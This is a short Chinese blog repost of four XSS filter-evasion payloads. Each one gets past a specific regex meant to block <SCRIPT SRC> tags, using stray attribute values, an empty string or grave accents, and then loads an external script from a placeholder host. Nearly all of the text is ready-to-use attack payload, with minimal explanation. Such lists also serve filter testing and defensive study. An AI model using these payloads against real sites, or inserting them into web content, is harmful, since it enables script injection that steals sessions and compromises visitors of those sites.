本文详细解析了如何通过正则表达式过滤器绕过XSS攻击,包括利用`src`属性、`script`标签内的属性、空字符串等方法。提供了四个绕过示例,帮助理解不同场景下的XSS攻击绕过策略。
1.This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":
代码:<SCRIPT a=">" SRC="http://www.xxx.com/xss.js"></SCRIPT>
2.For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"
代码:<SCRIPT =">" SRC="http://www.xxx.com/xss.js"></SCRIPT>
3.Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":
代码:<SCRIPT a=">" '' SRC="http://www.xxx.com/xss.js"></SCRIPT>
4.And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents
代码:<SCRIPT a=`>` SRC="www.xxx.com/xss.js"></SCRIPT>
转载于:https://blog.51cto.com/whitehat/821493
扫一扫
456
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
